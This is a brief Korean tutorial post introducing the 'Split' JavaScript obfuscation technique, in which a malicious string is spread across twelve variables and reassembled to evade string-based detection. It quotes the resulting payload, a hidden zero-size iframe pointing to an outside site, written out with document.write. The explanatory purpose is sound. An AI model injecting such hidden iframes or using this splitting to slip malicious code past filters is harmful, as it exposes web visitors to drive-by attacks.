NOTICE



 JAVA Script 난독화 중에서 기본적인 기법들에 대해 살펴보겠습니다.


 그 첫번째 시간으로 Split 기법에 대해 알아보겠습니다. Split 기법은 문자열 기반의 탐지를 회피하기 위한 가장 간단한 기법입니다. 악성 문자열을 다수의 String 변수에 잘게 나눈 후 마지막에 재조합하는 방식입니다. 아래 코드는 문자열 회피 목적으로 작성된 Split 기법의 예입니다.



 문자열을 12개의 변수에 나눠놓고 document.write를 사용해서 "<iframe id=kaien src=http://newheart.kr width=0 height=0></iframe>"이 출력되도록 작성되었습니다.


[그림 1.1.] 출력코드 확인


 웹 브라우저를 실행하면 [그림 1.1.]과 같이 출력 코드를 확인할 수 있습니다.